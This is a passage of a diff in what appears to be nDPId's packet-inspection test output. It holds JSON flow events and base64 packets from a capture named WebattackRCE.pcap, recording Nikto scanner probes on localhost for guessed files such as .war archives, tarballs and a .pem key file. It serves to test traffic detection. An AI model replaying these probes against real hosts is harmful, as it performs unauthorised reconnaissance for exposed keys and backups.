(Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277023,"pkt":"AAAAAAAAAAAAAAAACABFAAC9\/jtAAEAGPf1\/AAABfwAAAcNOH5DeVcZf0\/y26IAYAED+sQAAAQEICp1m\/EedZvxHR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277025,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VlRAAEAG5eR\/AAABfwAAAcNQH5CjGG47rGEO3YAYAED+sQAAAQEICp1m\/EmdZvxJR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277027,"pkt":"AAAAAAAAAAAAAAAACABFAADAghpAAEAGuht\/AAABfwAAAcNSH5AdH7pxZz3Y6IAYAED+tAAAAQEICp1m\/EudZvxLR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277028,"pkt":"AAAAAAAAAAAAAAAACABFAADA6xtAAEAGURp\/AAABfwAAAcNUH5DAadNxZUvEiYAYAED+tAAAAQEICp1m\/EydZvxMR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277029,"pkt":"AAAAAAAAAAAAAAAACABFAADAF9FAAEAGJGV\/AAABfwAAAcNWH5ByeS+n3HjH64AYAED+tAAAAQEICp1m\/E2dZvxNR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277031,"pkt":"AAAAAAAAAAAAAAAACABFAADASFpAAEAG89t\/AAABfwAAAcNYH5CIKHAy4FE5l4AYAED+tAAAAQEICp1m\/E+dZvxPR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277032,"pkt":"AAAAAAAAAAAAAAAACABFAAC9MI5AAEAGC6t\/AAABfwAAAcNaH5DGiQjnE8I6SoAYAED+sQAAAQEICp1m\/FCdZvxQR0VUIC8wLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277033,"pkt":"AAAAAAAAAAAAAAAACABFAAC9R6NAAEAG9JV\/AAABfwAAAcNcH5BSP3\/MbAOkN4AYAED+sQAAAQEICp1m\/FGdZvxRR0VUIC8wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 